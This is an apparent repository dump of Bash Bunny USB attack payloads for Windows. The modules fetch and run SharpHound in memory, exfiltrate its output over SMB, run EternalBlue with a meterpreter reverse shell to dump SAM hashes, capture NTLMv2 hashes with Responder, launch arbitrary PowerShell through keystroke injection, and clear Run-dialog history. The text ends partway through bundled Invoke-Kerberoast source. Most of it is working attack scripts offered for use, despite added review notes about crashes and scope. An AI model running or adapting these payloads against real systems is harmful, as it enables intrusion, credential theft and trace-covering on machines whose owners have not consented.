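├── Bunnyhound
│   ├── SharpHound.ps1
│   ├── payload.txt
│   ├── readme.md
│   └── s.ps1
├── Eternal_SAM_dump
│   ├── dump.rc
│   ├── payload.txt
│   ├── post.rc
│   └── readme.md
├── Metasploit_Installer
│   ├── msfdb.sh
│   ├── payload.txt
│   └── readme.md
├── Nmap_Installer
│   ├── payload.txt
│   └── readme.md
├── PS_Launcher
│   ├── payload.txt
│   ├── powershell_exec.txt
│   └── readme.md
├── Quickdraw
│   ├── payload.txt
│   └── readme.md
├── README.md
└── Roaster
    ├── invoke-kerberoast.ps1
    ├── payload.txt
    ├── readme.md
    └── s.ps1
/Bunnyhound/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Bunnyhound
# Author: golem445
# Version: 1.0
# Dependencies: Impacket, gohttp
# Runtime: Dependent on domain size
#
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to import Sharphound into memory via local
# web server and execute the attack. Results are exported
# to the loot directory via SMB.
#
# Review notes:
#  * The target fetches s.ps1 and SharpHound.ps1 over plain HTTP from the
#    Bunny (172.16.64.1) and writes the BloodHound archive to an
#    unauthenticated SMB share. Both only traverse the USB/RNDIS link,
#    but gohttp serves the whole payload directory, so keep loot and
#    notes out of /root/udisk/payloads/$SWITCH_POSITION.
#  * The wait for EXFILTRATION_COMPLETE has a timeout: if the HID stage
#    never runs (locked screen, PowerShell blocked, DownloadString
#    denied) the device no longer spins forever; it cleans up, keeps
#    whatever reached the share and ends on LED FAIL.
#  * The helper servers are stopped before the loot is moved so nothing
#    can write to the share while it is being copied to udisk.
#  * The original "Move Kerberos SPNS" comment was a copy/paste from
#    Roaster; this payload moves BloodHound output.

# Start Setup
LED SETUP

# Check dependencies
REQUIRETOOL impacket gohttp
GET SWITCH_POSITION

# Temporary loot directory (RAM, wiped every run) backing the SMB share
TMPLOOT=/loot/smb
mkdir -p "$TMPLOOT"

# Permanent loot directory on the USB mass-storage partition
LOOTDIR=/root/udisk/loot/bunnyhound_exfil
mkdir -p "$LOOTDIR"

# Seconds to wait for EXFILTRATION_COMPLETE before giving up.
# Collection time scales with domain size; raise for large domains.
EXFIL_TIMEOUT=900

# Set interfaces
ATTACKMODE RNDIS_ETHERNET HID

# Start web server (serves s.ps1 and SharpHound.ps1 from this payload dir)
cd "/root/udisk/payloads/$SWITCH_POSITION" || { LED FAIL; exit 1; }
gohttp -p 80 &
HTTP_PID=$!

# Start SMB Server: share "s" backed by the temporary loot directory
python /tools/impacket/examples/smbserver.py s "$TMPLOOT" &
SMB_PID=$!

# Start attack
LED ATTACK
RUN WIN powershell
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
Q ENTER

# Wait until files are done copying (s.ps1 writes the marker file last).
LED STAGE2
waited=0
timed_out=0
while [ ! -f "$TMPLOOT/EXFILTRATION_COMPLETE" ]; do
  if [ "$waited" -ge "$EXFIL_TIMEOUT" ]; then
    timed_out=1
    break
  fi
  sleep 1
  waited=$((waited + 1))
done

# Start Cleanup
LED CLEANUP

# Stop the helper servers first so the share cannot change mid-copy
kill "$HTTP_PID" "$SMB_PID" 2>/dev/null

# Delete marker file
rm -f "$TMPLOOT/EXFILTRATION_COMPLETE"

# Move BloodHound output to the permanent loot directory
find "$TMPLOOT" -mindepth 1 -maxdepth 1 -exec mv -- {} "$LOOTDIR/" \;

# Sync file system
sync

# Complete (FAIL if the marker never arrived; partial loot is kept)
if [ "$timed_out" -eq 0 ]; then
  LED FINISH
else
  LED FAIL
fi
--------------------------------------------------------------------------------
/Bunnyhound/readme.md:
--------------------------------------------------------------------------------
# Bunnyhound
* Author: golem445
* Version: 1.0
* Target: Windows Domains

## Description

Sets up Ethernet and HID keyboard interfaces simultaneously,
then uses HID to import Sharphound into memory via Bash Bunny
web server and execute the attack. Results are exported to
the loot directory via SMB.

Note: Because only a network adapter and a keyboard are emulated (no USB
mass-storage device), Group Policy restrictions on removable disks do not
block this module. All traffic (HTTP download of the script, SMB exfil of
the results) stays on the USB link between the target and the Bash Bunny.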
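## Requirements

Impacket and gohttp must be installed on the Bash Bunny
(`REQUIRETOOL impacket gohttp` aborts with a flashing red LED if either is missing)

## STATUS

| Status              | Description                              |
| ------------------- | ---------------------------------------- |
| Flashing Red        | Impacket or gohttp not found             |
| Solid Violet        | Setup for attack                         |
| Flashing Amber      | Attack in progress                       |
| Flashing Cyan       | Cleaning up                              |
| Solid Green         | Attack complete                          |

## Credits

* Hak5Darren for SMB exfil
--------------------------------------------------------------------------------
/Bunnyhound/s.ps1:
--------------------------------------------------------------------------------
# Stage 2 of Bunnyhound, run in memory on the target by the HID stage.
# Everything here stays on the USB/RNDIS link: 172.16.64.1 is the Bash Bunny.
# File name case now matches SharpHound.ps1 as shipped in this directory: the
# udisk (FAT) partition is case-insensitive, but a copy served from a
# case-sensitive filesystem would 404 on the original 'Sharphound.ps1'.
IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/SharpHound.ps1');Invoke-Bloodhound -NoSaveCache -CompressData
# Push the compressed collection to the Bunny's SMB share "s". The archive
# name is expected to contain "Blood"; newer SharpHound builds may prefix a
# timestamp, which the original 'Blood*' glob would miss, so match anywhere.
move *Blood* \\172.16.64.1\s\
# Marker the payload polls for; must be written after the data copy.
New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
# Removes the Win+R history (RunMRU) entry left by the HID stage.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
exit
--------------------------------------------------------------------------------
/Eternal_SAM_dump/dump.rc:
--------------------------------------------------------------------------------
# Metasploit resource script started by Eternal_SAM_dump/payload.txt.
# RHOST is the default RNDIS lease handed to the plugged-in host; LHOST is
# the Bash Bunny itself. post.rc (hashdump) runs on session open and its
# output lands in the spool file, which payload.txt filters for ':::' lines.
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOST 172.16.64.64
set LHOST 172.16.64.1
set AutoRunScript post.rc
spool /root/sam_dump.txt
exploit
--------------------------------------------------------------------------------
/Eternal_SAM_dump/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Eternal_SAM_Dump
# Author: golem445
# Version: 1.0
# Dependencies: Metasploit, Nmap 7.70+
# Runtime: 3+ minutes
# Tested OS's: Windows 7, Windows 2008
#
# This module first tests if a host is vulnerable to MS17-010. If
# patched, the LED will turn red. If vulnerable, a blue light will
# flash and the module will dump the SAM regardless if the machine
# is locked. SAM hashes are then exported to the loot directory.
#
# Review notes:
#  * MS17-010 (EternalBlue) is a kernel memory-corruption exploit; a
#    failed attempt can blue-screen the target. Only run against hosts
#    in scope where downtime is acceptable.
#  * The original gate ran the exploit whenever "is patched." was absent
#    from every *.txt in /root -- i.e. also when nmap could not reach
#    port 445 at all -- while a stale sam_dump.txt could also match.
#    The scan now goes to its own file and the exploit only runs on an
#    explicit "State: VULNERABLE" verdict from the NSE script.
#  * TARGET_HOSTNAME appears to be populated only by GET TARGET_HOSTNAME
#    (Quickdraw calls it; this payload did not), so every loot folder
#    was named "unknown-N". The hostname comes from the target and is
#    sanitised before being used as a directory name.

LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION
GET TARGET_HOSTNAME
LOOTDIR=/root/udisk/loot
HOST=${TARGET_HOSTNAME}
TARGET=172.16.64.64          # RNDIS lease of the host; matches RHOST in dump.rc
SCAN=/root/ms17_010_scan.xml
SPOOL=/root/sam_dump.txt     # must match the 'spool' path in dump.rc
mkdir -p "$LOOTDIR"

# Check if host is vulnerable to ms17-010
LED ATTACK
cd /root/ || exit 1
rm -f "$SCAN"
nmap -v -p445 -Pn -n --script smb-vuln-ms17-010.nse "$TARGET" -oX "$SCAN"

# Run the exploit only on a positive verdict. Anything else (patched,
# port closed, host unreachable, scan error, no script output) ends in
# LED FAIL instead of firing a kernel exploit blind.
if [ -s "$SCAN" ] && grep -q 'State: VULNERABLE' "$SCAN"; then
  # Attack
  LED C SLOW
  rm -f "$SCAN"
  cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1
  rm -f "$SPOOL"
  # NOTE(review): after a successful exploit msfconsole interacts with the
  # new session; confirm it exits on its own in this unattended context,
  # otherwise add 'exploit -z' / 'exit -y' to dump.rc.
  msfconsole -q -r dump.rc

  # Cleanup
  # If hostname is blank, set to "unknown"; otherwise keep only safe chars
  [ -z "$HOST" ] && HOST="unknown"
  HOST=${HOST//[^A-Za-z0-9._-]/_}
  # Next free numbered folder for this host
  COUNT=$(find "$LOOTDIR" -maxdepth 1 -name "$HOST-*" | wc -l)
  COUNT=$((COUNT + 1))
  OUT="$LOOTDIR/$HOST-$COUNT"
  mkdir -p "$OUT"
  # Keep only hashdump lines (user:rid:lm:nt:::); drop console chatter
  if [ -f "$SPOOL" ]; then
    grep ':::' "$SPOOL" > "$OUT/sam_dump.txt"
    rm -f "$SPOOL"
  fi
  sync

  # Done
  LED FINISH
else
  rm -f "$SCAN"
  LED FAIL
fi
--------------------------------------------------------------------------------
/Eternal_SAM_dump/post.rc:
--------------------------------------------------------------------------------
# Runs automatically on the new meterpreter session (AutoRunScript in dump.rc).
# Output is captured by dump.rc's 'spool' file; payload.txt keeps the ':::' lines.
run post/windows/gather/hashdump
--------------------------------------------------------------------------------
/Eternal_SAM_dump/readme.md:
--------------------------------------------------------------------------------
# Eternal_SAM_Dump
* Author: golem445
* Version: 1.0
* Target: Windows 7, Windows 2008

## Description

This module first tests if a host is vulnerable to MS17-010. If patched, the LED will
turn red.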
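If vulnerable, a blue light will flash and the module will dump the SAM
regardless of whether the machine is locked. SAM hashes are then exported to the loot directory.

Warning: MS17-010 exploitation relies on kernel memory corruption; a failed
attempt can crash (blue-screen) the target. Use only against in-scope hosts
where downtime is acceptable, and treat the dumped hashes as credentials.

## Requirements

Metasploit and Nmap 7.70+ should be installed

## STATUS

| Status              | Description                              |
| ------------------- | ---------------------------------------- |
| Solid Violet        | Setup for attack                         |
| Flashing Red        | Host is patched against MS17-010         |
| Flashing Cyan       | Appears vulnerable, attack in progress   |
| Solid Green         | Attack complete                          |

## Credits

* zerosum0x0 for his work on the Eternalblue Metasploit module
--------------------------------------------------------------------------------
/Metasploit_Installer/msfdb.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Creates the PostgreSQL role and databases Metasploit expects and writes a
# matching database.yml to /opt (Metasploit_Installer/payload.txt copies it
# into /root/.msf4). Derived from the Pentesters Framework / Metasploit
# development-environment setup.
#
# Review notes:
#  * The here-doc redirections were missing ("cat < /opt/pg-utf8.sql" would
#    try to read the file, and the SQL lines would run as shell commands);
#    restored as "cat <<EOF > file".
#  * The DB password was a fixed default ('RedvsBlue') shared by every
#    install of this payload. PostgreSQL only listens on localhost here,
#    but a per-install random secret costs nothing, so one is generated
#    and written to both the role and database.yml; that file is then
#    chmod 600 because it holds the secret.
#  * The psql/createuser/createdb commands run as the postgres OS user via
#    "su postgres -c" (the original "postgres psql ..." is not a valid
#    invocation) -- confirm su is available on the Bunny image.
set -e

# Per-install database password
DB_PASS=$(tr -dc 'A-Za-z0-9' </dev/urandom | head -c 24)

# Rebuild template1 as UTF8 so Metasploit's databases are created with the
# encoding it expects (template0 is temporarily made connectable for this).
# Quoted delimiter: nothing in the SQL is meant to be expanded by the shell.
cat <<'EOF' > /opt/pg-utf8.sql
update pg_database set datallowconn = TRUE where datname = 'template0';
\c template0
update pg_database set datistemplate = FALSE where datname = 'template1';
drop database template1;
create database template1 with template = template0 encoding = 'UTF8';
update pg_database set datistemplate = TRUE where datname = 'template1';
\c template1
update pg_database set datallowconn = FALSE where datname = 'template0';
\q
EOF

# Run the PostgreSQL client tools as the postgres OS user.
as_pg() { su postgres -c "$*"; }

as_pg "psql -f /opt/pg-utf8.sql"
as_pg "createuser msfdev -dRS"
# Password is fed on stdin so it never appears in the process list.
printf "ALTER USER msfdev WITH ENCRYPTED PASSWORD '%s';\n" "$DB_PASS" | as_pg psql
as_pg "createdb --owner msfdev msf_dev_db"
as_pg "createdb --owner msfdev msf_test_db"

# Unquoted delimiter: $DB_PASS must expand here.
cat <<EOF > /opt/database.yml

# Development Database
development: &pgsql
  adapter: postgresql
  database: msf_dev_db
  username: msfdev
  password: $DB_PASS
  host: localhost
  port: 5432
  pool: 5
  timeout: 5

# Production database -- same as dev
production: &production
  <<: *pgsql

# Test database -- not the same, since it gets dropped all the time
test:
  <<: *pgsql
  database: msf_test_db
EOF
# database.yml contains the DB credential; restrict it to root.
chmod 600 /opt/database.yml
# echo "Manually move /opt/database.yml to $HOME/.msf4/database.yml"

--------------------------------------------------------------------------------
/Metasploit_Installer/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Metasploit_Installer
# Author: golem445
# Version: 1.0
# Dependencies: Internet Connection Sharing enabled
#
# Sets up an Ethernet interface, then proceeds
# to install Metasploit on the Bash Bunny using
# a re-engineered Pentesters Framework script
#
# Review notes:
#  * Everything below runs as root and executes code fetched from the
#    Internet. The original fetched the installer with "curl -k" (TLS
#    verification off), which lets anyone on the path substitute the
#    script; -k is removed and curl now fails on HTTP errors instead of
#    saving an error page that would then be executed.
#  * The device has no RTC, so the clock is forced to a fixed date
#    (presumably so certificate validity checks can pass at all). Bump
#    this date when installs fail with "not yet valid"/"expired".
#  * The original ran "chmod +x msfdb.sh; sh msfdb.sh" from /root after
#    copying the script to /root/metasploit/, so the DB setup never ran.
#  * database.yml holds the DB credential and is copied with mode 600.

## Get setup
LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION

# Install dependencies
apt-get update -y
apt-get install -y autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev

# Prep for and retrieve Metasploit files
cd /root/ || exit 1
# Fixed date: no RTC on the device (see review notes)
date -s '20180518'
wget -O - https://apt.metasploit.com/metasploit-framework.gpg.key | apt-key add -
# TLS verified (no -k); --fail refuses to save an HTTP error body as the installer
curl --fail -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall || { LED FAIL; exit 1; }
chmod 755 msfinstall

## Install Metasploit
LED ATTACK
./msfinstall
update-rc.d postgresql enable
mkdir -p /root/metasploit/
cp "/root/udisk/payloads/$SWITCH_POSITION/msfdb.sh" /root/metasploit/
bash /root/metasploit/msfdb.sh
mkdir -p /root/.msf4
# database.yml holds the DB credential: copy with restrictive permissions
install -m 600 /opt/database.yml /root/.msf4/database.yml

# Cleanup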
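rm -rf /root/metasploit/
# NOTE(review): this removes the msf* wrappers the omnibus installer appears
# to place in /usr/local/bin; Eternal_SAM_dump calls 'msfconsole' by name,
# so confirm the framework's bin directory is still on PATH for payloads.
rm -rf /usr/local/bin/msf*
rm -f /root/msfinstall

# Sync the file system
sync

## Finished
LED FINISH
--------------------------------------------------------------------------------
/Metasploit_Installer/readme.md:
--------------------------------------------------------------------------------
# Metasploit_Installer
* Author: golem445
* Version: 1.0

## Description

Sets up an Ethernet interface, then proceeds to install Metasploit
on the Bash Bunny using a re-engineered Pentesters Framework script

Note: the payload runs installer scripts downloaded from the Internet as
root on the Bash Bunny. Review them before use and keep the download URLs
pointed at sources you trust.

## Requirements

Internet Connection Sharing should be enabled to the Bash Bunny
(See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for
additional guidance)

## STATUS

| Status              | Description                              |
| ------------------- | ---------------------------------------- |
| Solid Violet        | Setup for install                        |
| Flashing Amber      | Installing Metasploit                    |
| Solid Green         | Installation complete                    |

## Credits

* David Kennedy (ReL1K) - For creating the original PTF script

--------------------------------------------------------------------------------
/Nmap_Installer/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Nmap_Installer
# Author: golem445
# Version: 1.0
# Dependencies: Internet Connection Sharing enabled
#
# Installs the latest Nmap via subversion
#
# Review notes:
#  * "apt-get install" without -y blocks on the confirmation prompt, and
#    a payload has no console to answer it; -y is required unattended.
#  * The build steps are chained so a failed checkout or compile ends on
#    LED FAIL instead of silently reporting success.

## Get setup
LED SETUP
ATTACKMODE RNDIS_ETHERNET

# Install dependencies
apt-get update -y
apt-get install -y subversion autoconf build-essential libssl-dev

## Install Nmap
LED ATTACK
cd /root/ || exit 1
# Trunk checkout over TLS from the project's canonical repository
if svn co https://svn.nmap.org/nmap/ && cd nmap && ./configure && make && make install; then
  status=0
else
  status=1
fi

# Cleanup
cd /root/
rm -rf /root/nmap

# Sync the file system
sync

## Finished
if [ "$status" -eq 0 ]; then
  LED FINISH
else
  LED FAIL
fi
--------------------------------------------------------------------------------
/Nmap_Installer/readme.md:
--------------------------------------------------------------------------------
# Nmap_Installer
* Author: golem445
* Version: 1.0

## Description

Sets up Ethernet, then proceeds to install the latest Nmap via subversion

## Requirements

Internet Connection Sharing should be enabled to the Bash Bunny
(See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for
additional guidance)

## STATUS

| Status              | Description                              |
| ------------------- | ---------------------------------------- |
| Solid Violet        | Setup for install                        |
| Flashing Amber      | Installing Nmap                          |
| Solid Green         | Installation complete                    |

--------------------------------------------------------------------------------
/PS_Launcher/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: PS_Launcher
# Author: golem445
# Version: 1.0
# Dependencies: gohttp
# Runtime: ~5 seconds
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to execute the configured Powershell command
# via local web server. Insert the Powershell payload to be
# executed into your powershell_exec.txt file.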
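#
# Review notes:
#  * gohttp serves the whole payload directory to the target, not just
#    s.ps1 -- payload.txt, readme.md and powershell_exec.txt are all
#    fetchable by the host during the attack. Keep notes and loot elsewhere.
#  * Running with powershell_exec.txt still holding the shipped placeholder
#    would type a meaningless command on the target; it is now refused
#    with LED FAIL before any HID activity.
#  * gohttp is deliberately left running after LED FINISH: the target
#    fetches s.ps1 asynchronously after the Run dialog is submitted.

# Start Setup
LED SETUP

# Check dependencies
REQUIRETOOL gohttp
GET SWITCH_POSITION

# Refuse to run with the unedited template (see powershell_exec.txt)
PAYLOAD_DIR="/root/udisk/payloads/$SWITCH_POSITION"
if [ ! -s "$PAYLOAD_DIR/powershell_exec.txt" ] || grep -q 'Replace text with powershell command' "$PAYLOAD_DIR/powershell_exec.txt"; then
  LED FAIL
  exit 1
fi

# Set interfaces
ATTACKMODE RNDIS_ETHERNET HID

# Start web server
cd "$PAYLOAD_DIR" || { LED FAIL; exit 1; }
cp -f powershell_exec.txt s.ps1
gohttp -p 80 &

# Start attack
LED ATTACK
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"

# Sync file system
sync

# Complete
LED FINISH
--------------------------------------------------------------------------------
/PS_Launcher/powershell_exec.txt:
--------------------------------------------------------------------------------
Replace text with powershell command
--------------------------------------------------------------------------------
/PS_Launcher/readme.md:
--------------------------------------------------------------------------------
# PS_Launcher
* Author: golem445
* Version: 1.0

## Description

Sets up Ethernet and HID keyboard interfaces simultaneously,
then uses HID to execute the configured Powershell command
via local web server. Insert the Powershell payload to be
executed into your powershell_exec.txt file.

Note: Because only a network adapter and a keyboard are emulated (no USB
mass-storage device), Group Policy restrictions on removable disks do not
block this module. The whole payload directory is served over HTTP to the
target while the module runs, so keep nothing sensitive in it.

## Requirements

gohttp should be installed

## STATUS

| Status              | Description                              |
| ------------------- | ---------------------------------------- |
| Flashing Red        | gohttp not found, or powershell_exec.txt still holds the placeholder text |
| Solid Violet        | Setup for attack                         |
| Flashing Amber      | Attack in progress                       |
| Flashing Cyan       | (not used: this payload has no cleanup stage) |
| Solid Green         | Attack complete                          |

--------------------------------------------------------------------------------
/Quickdraw/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Quickdraw
# Author: golem445
# Version: 1.0
# Dependencies: Responder
# Runtime: ~8 seconds
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# runs Responder, then uses HID to generate an NTLMv2 hash
# response from the target computer.
#
# Review notes:
#  * TARGET_HOSTNAME is supplied by the target and is used as a path
#    component under the loot directory; it is sanitised so a hostname
#    containing "/" or ".." cannot write outside $LOOTDIR.
#  * "[ -f logs/*NTLM* ]" fails with "too many arguments" as soon as
#    Responder writes a second NTLM log file; the wait is now a glob loop
#    with a timeout so the payload cannot spin forever when the HID stage
#    fails (locked screen, outbound SMB blocked).
#  * Responder is stopped before the logs are copied, so the files on the
#    loot partition are complete and nothing keeps answering name
#    resolution on the USB link after the capture.

# Prereq check
REQUIRETOOL responder

# Begin attack setup
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET TARGET_HOSTNAME
LOOTDIR=/root/udisk/loot/quickdraw
CAPTURE_TIMEOUT=60   # seconds to wait for an NTLMv2 capture

# Prep loot logging
mkdir -p "$LOOTDIR"
HOST=${TARGET_HOSTNAME}
[ -z "$HOST" ] && HOST="unknown"
HOST=${HOST//[^A-Za-z0-9._-]/_}     # untrusted input: keep it a single safe path component
COUNT=$(find "$LOOTDIR" -maxdepth 1 -name "$HOST-*" | wc -l)
COUNT=$((COUNT + 1))
OUT="$LOOTDIR/$HOST-$COUNT"
mkdir -p "$OUT"
cd /tools/responder/ || { LED FAIL; exit 1; }
rm -f logs/*

# Begin Responder on the RNDIS link only
# (-w WPAD rogue proxy, -f fingerprint, -v verbose, -r answer NBT-NS wredir queries)
LED ATTACK
python Responder.py -I usb0 -wfvr &
RESPONDER_PID=$!

## Start HID Attack: a UNC path argument makes the host authenticate to the Bunny
sleep 1
RUN WIN cmd
Q DELAY 250
Q STRING "powershell \\\\172.16.64.1\\s"
Q ENTER
Q STRING "exit"
Q ENTER

# Wait for NTLMv2 capture to complete
LED STAGE2
waited=0
captured=0
while [ "$waited" -lt "$CAPTURE_TIMEOUT" ]; do
  for f in logs/*NTLM*; do
    [ -f "$f" ] && captured=1
  done
  [ "$captured" -eq 1 ] && break
  sleep 1
  waited=$((waited + 1))
done

# Stop Responder, then copy whatever was logged to the loot directory
kill "$RESPONDER_PID" 2>/dev/null
cp logs/* "$OUT" 2>/dev/null

# Sync the file system
sync

## Finished
if [ "$captured" -eq 1 ]; then
  LED FINISH
else
  LED FAIL
fi
--------------------------------------------------------------------------------
/Quickdraw/readme.md: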
-------------------------------------------------------------------------------- 1 | # Quickdraw 2 | * Author: golem445 3 | * Version: 1.0 4 | * Target: Windows Domains 5 | 6 | ## Description 7 | 8 | Sets up Ethernet and HID keyboard interfaces simultaneously, 9 | runs Responder, then uses HID to generate an NTLMv2 hash 10 | response from the target computer. 11 | 12 | Note: This module will bypass network restrictions on USB 13 | disk drives as only a network card and keyboard are emulated. 14 | 15 | ## Requirements 16 | 17 | Responder should be installed 18 | 19 | ## STATUS 20 | 21 | | Status | Description | 22 | | ------------------- | ---------------------------------------- | 23 | | Flashing Red | Responder not found | 24 | | Solid Violet | Setup for attack | 25 | | Flashing Amber | Attack in progress | 26 | | Solid Green | Attack complete | 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bunny_payloads -------------------------------------------------------------------------------- /Roaster/invoke-kerberoast.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | Invoke-Kerberoast.ps1 4 | Author: Will Schroeder (@harmj0y), @machosec 5 | License: BSD 3-Clause 6 | Required Dependencies: None 7 | 8 | Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). 9 | 10 | Note: the primary method of use will be Invoke-Kerberoast with various targeting options. 11 | 12 | #> 13 | 14 | function Get-DomainSearcher { 15 | <# 16 | .SYNOPSIS 17 | 18 | Helper used by various functions that builds a custom AD searcher object. 
19 | 20 | Author: Will Schroeder (@harmj0y) 21 | License: BSD 3-Clause 22 | Required Dependencies: Get-NetDomain 23 | 24 | .DESCRIPTION 25 | 26 | Takes a given domain and a number of customizations and returns a 27 | System.DirectoryServices.DirectorySearcher object. This function is used 28 | heavily by other LDAP/ADSI search function. 29 | 30 | .PARAMETER Domain 31 | 32 | Specifies the domain to use for the query, defaults to the current domain. 33 | 34 | .PARAMETER LDAPFilter 35 | 36 | Specifies an LDAP query string that is used to filter Active Directory objects. 37 | 38 | .PARAMETER Properties 39 | 40 | Specifies the properties of the output object to retrieve from the server. 41 | 42 | .PARAMETER SearchBase 43 | 44 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 45 | Useful for OU queries. 46 | 47 | .PARAMETER SearchBasePrefix 48 | 49 | Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration"). 50 | 51 | .PARAMETER Server 52 | 53 | Specifies an Active Directory server (domain controller) to bind to for the search. 54 | 55 | .PARAMETER SearchScope 56 | 57 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 58 | 59 | .PARAMETER ResultPageSize 60 | 61 | Specifies the PageSize to set for the LDAP searcher object. 62 | 63 | .PARAMETER SecurityMasks 64 | 65 | Specifies an option for examining security information of a directory object. 66 | One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. 67 | 68 | .PARAMETER Tombstone 69 | 70 | Switch. Specifies that the searcher should also return deleted/tombstoned objects. 71 | 72 | .PARAMETER Credential 73 | 74 | A [Management.Automation.PSCredential] object of alternate credentials 75 | for connection to the target domain. 76 | 77 | .EXAMPLE 78 | 79 | Get-DomainSearcher -Domain testlab.local 80 | 81 | Return a searcher for all objects in testlab.local. 
82 | 83 | .EXAMPLE 84 | 85 | Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon' 86 | 87 | Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties. 88 | 89 | .EXAMPLE 90 | 91 | Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" 92 | 93 | Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU). 94 | 95 | .OUTPUTS 96 | 97 | System.DirectoryServices.DirectorySearcher 98 | #> 99 | 100 | [OutputType('System.DirectoryServices.DirectorySearcher')] 101 | [CmdletBinding()] 102 | Param( 103 | [Parameter(ValueFromPipeline = $True)] 104 | [ValidateNotNullOrEmpty()] 105 | [String] 106 | $Domain, 107 | 108 | [ValidateNotNullOrEmpty()] 109 | [Alias('Filter')] 110 | [String] 111 | $LDAPFilter, 112 | 113 | [ValidateNotNullOrEmpty()] 114 | [String[]] 115 | $Properties, 116 | 117 | [ValidateNotNullOrEmpty()] 118 | [String] 119 | $SearchBase, 120 | 121 | [ValidateNotNullOrEmpty()] 122 | [String] 123 | $SearchBasePrefix, 124 | 125 | [ValidateNotNullOrEmpty()] 126 | [String] 127 | $Server, 128 | 129 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 130 | [String] 131 | $SearchScope = 'Subtree', 132 | 133 | [ValidateRange(1,10000)] 134 | [Int] 135 | $ResultPageSize = 200, 136 | 137 | [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] 138 | [String] 139 | $SecurityMasks, 140 | 141 | [Switch] 142 | $Tombstone, 143 | 144 | [Management.Automation.PSCredential] 145 | [Management.Automation.CredentialAttribute()] 146 | $Credential = [Management.Automation.PSCredential]::Empty 147 | ) 148 | 149 | PROCESS { 150 | 151 | if ($Domain) { 152 | $TargetDomain = $Domain 153 | } 154 | else { 155 | $TargetDomain = (Get-NetDomain).name 156 | } 157 | 158 | if ($Credential -eq [Management.Automation.PSCredential]::Empty) { 159 | if (-not $Server) { 160 | try { 161 | # if there's no -Server specified, try to pull the primary DC to bind 
to 162 | $BindServer = ((Get-NetDomain).PdcRoleOwner).Name 163 | } 164 | catch { 165 | throw 'Get-DomainSearcher: Error in retrieving PDC for current domain' 166 | } 167 | } 168 | } 169 | elseif (-not $Server) { 170 | try { 171 | $BindServer = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name 172 | } 173 | catch { 174 | throw 'Get-DomainSearcher: Error in retrieving PDC for current domain' 175 | } 176 | } 177 | 178 | $SearchString = 'LDAP://' 179 | 180 | if ($BindServer) { 181 | $SearchString += $BindServer 182 | if ($TargetDomain) { 183 | $SearchString += '/' 184 | } 185 | } 186 | 187 | if ($SearchBasePrefix) { 188 | $SearchString += $SearchBasePrefix + ',' 189 | } 190 | 191 | if ($SearchBase) { 192 | if ($SearchBase -Match '^GC://') { 193 | # if we're searching the global catalog, get the path in the right format 194 | $DN = $SearchBase.ToUpper().Trim('/') 195 | $SearchString = '' 196 | } 197 | else { 198 | if ($SearchBase -match '^LDAP://') { 199 | if ($SearchBase -match "LDAP://.+/.+") { 200 | $SearchString = '' 201 | } 202 | else { 203 | $DN = $SearchBase.Substring(7) 204 | } 205 | } 206 | else { 207 | $DN = $SearchBase 208 | } 209 | } 210 | } 211 | else { 212 | if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { 213 | $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" 214 | } 215 | } 216 | 217 | $SearchString += $DN 218 | Write-Verbose "Get-DomainSearcher search string: $SearchString" 219 | 220 | if ($Credential -ne [Management.Automation.PSCredential]::Empty) { 221 | Write-Verbose "Using alternate credentials for LDAP connection" 222 | $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, 